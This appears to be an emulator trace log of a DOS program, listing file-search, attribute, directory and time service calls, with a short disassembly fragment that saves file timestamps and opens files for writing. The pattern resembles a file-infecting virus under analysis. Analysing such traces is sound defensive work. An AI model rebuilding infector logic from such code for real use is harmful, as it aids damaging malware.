2018-12-25T12:28:47.233316412Z 67 PC: 12b63 | Get or set file attributes
2018-12-25T12:28:47.237810533Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:47.240500338Z 59 PC: 12aa6 | Change current directory
2018-12-25T12:28:47.244254872Z 44 PC: 12af0 | Get time 0x12af0: cmp dh, 0xa
0x12af3: ja 0x12afb
0x12af5: mov bx, 0x2ae
0x12af8: call 0x22acd
0x12afb: int 0x20
0x12afd: mov bx, 0x80
0x12b00: mov ax, word ptr [bx + 0x15]
0x12b03: mov word ptr [0x2db], ax
0x12b06: mov ax, word ptr [bx + 0x16]
0x12b09: mov word ptr [0x2dd], ax
0x12b0c: mov ax, word ptr [bx + 0x18]
0x12b0f: mov word ptr [0x2df], ax
0x12b12: mov ax, word ptr [bx + 0x1a]
0x12b15: mov word ptr [0x2e1], ax
0x12b18: mov al, 2
0x12b1a: mov ah, 0x3d
0x12b1c: int 0x21
0x12b1e: mov word ptr [0x2e3], ax
0x12b21: mov bx, word ptr [0x2e3]
0x12b25: mov ah, 0x3e
2018-12-25T12:28:47.246193747Z 2 PC: 12adb | Character output (Char = '0d')
2018-12-25T12:28:47.24837525Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.251732639Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.253503625Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.25577878Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.257666287Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.259478698Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.26183577Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.263820565Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.265613059Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.26780107Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.269742492Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.271596432Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.274591654Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.276843804Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.279813667Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.283146396Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.285463559Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.28772534Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.290528445Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.292855172Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.295123944Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.298128397Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.300218435Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.302489174Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.305491113Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.307795051Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.309870041Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.313620652Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.315676455Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.317611009Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.320134155Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.322084576Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.324048787Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.32637993Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.329702782Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.331344933Z 2 PC: 12adb | Character output (See above)